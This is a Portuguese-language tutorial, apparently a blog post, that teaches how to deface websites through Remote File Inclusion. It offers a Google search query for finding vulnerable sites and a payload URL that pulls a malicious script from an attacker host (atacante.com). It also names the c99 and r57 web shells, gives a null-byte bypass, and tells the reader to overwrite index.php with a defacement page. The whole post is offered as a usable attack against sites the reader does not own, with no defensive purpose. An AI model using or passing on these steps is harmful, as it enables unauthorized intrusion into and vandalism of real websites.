WWW.FLEPS.COM.BR

COMO DESFIGURAR UM SITE USANDO O REMOTE FILE INCLUSION (RFI)?

By admin at 2019-05-17 • 0 colecionador • 870 visualizações de página

Como desfigurar um site usando o Remote File Inclusion (RFI)?


COMO DESFIGURAR UM SITE USANDO O REMOTE FILE INCLUSION (RFI)?

A RFI (Remote File Inclusion, Inclusão remota de arquivos) é uma técnica  que permite que o invasor carregue um código ou arquivo mal-intencionado em um site ou servidor. A vulnerabilidade explora o tipo diferente de verificações de validação em um site e pode levar à execução de código no servidor ou à execução de código no site. Desta vez, irei escrever um tutorial simples sobre Inclusão Remota de Arquivos e, no final do tutorial, suponho que você saberá do que se trata e poderá implantar um ataque.

RFI é uma vulnerabilidade comum. Todo o site hacking não é exatamente sobre injeção de SQL. Usando RFI você pode literalmente desfigurar os sites, ter acesso ao servidor e jogar quase tudo com o servidor. Por que colocar alerta vermelho nos sites, só por conta disso você só precisa ter seu bom senso e conhecimento básico de PHP para executar códigos maliciosos. O BASH pode ser útil, pois a maioria dos servidores atuais está hospedada no Linux.

ENTÃO, COMO HACKEAR UM SITE OU SERVIDOR COM RFI?

Primeiro de tudo, precisamos descobrir um site vulnerável a RFI. Vamos ver como podemos encontrar um.

Como sabemos, encontrar uma vulnerabilidade é o primeiro passo para invadir um site ou servidor. Então, vamos começar e basta ir ao Google e procurar a seguinte consulta.

inurl: “index.php? page = home”

No lugar de  home você também pode tentar algumas outras páginas como  produtos, galeria  e etc.

Se você já conhece um site vulnerável a RFI, não precisa encontrá-lo no Google.

Assim que o encontrarmos, vamos para o próximo passo. Vamos ver que temos um site vulnerável a RFIs.

http://vitima.com/index.php?page=home

Como você pode ver, este site puxa documentos armazenados em formato de texto do servidor e os processa como páginas da web. Agora podemos usar PHP include function para extraí-los. Vamos ver como isso funciona.

http://vitima.com/index.php?page=http://atacante.com/scriptMalicioso.txt

Eu incluí minha URL do código malicioso txt no lugar de casa. Você pode usar qualquer shell para o maliciosoScript como c99, r57 ou qualquer outro.

Agora, se é um site realmente vulnerável, então haveria 3 coisas que podem acontecer.

  1. Você deve ter notado que a URL consistia de  “page = home”  sem extensão, mas incluí uma extensão em minha URL, por isso o site pode apresentar um erro como 'falha ao incluir o arquivo malicioso.txt', isso pode acontecer site pode estar adicionando automaticamente a extensão .txt às páginas armazenadas no servidor.

  2. No caso, ele acrescenta automaticamente algo nas linhas de .php, então temos que usar um byte nulo '%00' para evitar erros.

  3. Execução bem sucedida.

À medida que obtivermos a execução bem-sucedida do código, estamos prontos para usar o shell. Agora vamos procurar o shell para index.php. E irá substituir o arquivo com a nossa página de desfiguração.


Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: